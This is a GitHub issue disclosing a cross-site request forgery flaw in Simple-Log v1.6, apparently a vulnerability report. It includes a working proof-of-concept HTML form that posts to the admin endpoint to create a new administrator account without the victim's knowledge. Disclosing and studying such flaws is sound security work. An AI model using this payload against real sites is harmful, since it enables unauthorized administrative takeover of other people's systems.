Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

One CSRF vulnerability in Simple-Log v1.6 #1

Open
github123abc123 opened this issue Feb 26, 2019 · 0 comments
Open

One CSRF vulnerability in Simple-Log v1.6 #1

github123abc123 opened this issue Feb 26, 2019 · 0 comments

Comments

@github123abc123
Copy link
Owner

github123abc123 commented Feb 26, 2019

An issue was discovered in Simple-Log v1.6. There is a CSRF vulnerability that can add Administrator Account in the ' /admin/admin.php?act=act_add_member'.

Add Administrator Account
Poc:
Create account:test3
password:a123456

<form method="POST" id="transfer" action="http://127.0.0.1/Simple-Log/admin/admin.php?act=act_add_member">    
    <input type="hidden" name="user_name" value="test3" />
    <input type="hidden" name="password" value="a123456" />
    <input type="hidden" name="group" value="1" />
    <input type="hidden" name="email" value="123@qq.com" />
    <input type="hidden" name="button" value="提交" />
</form>        

1

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant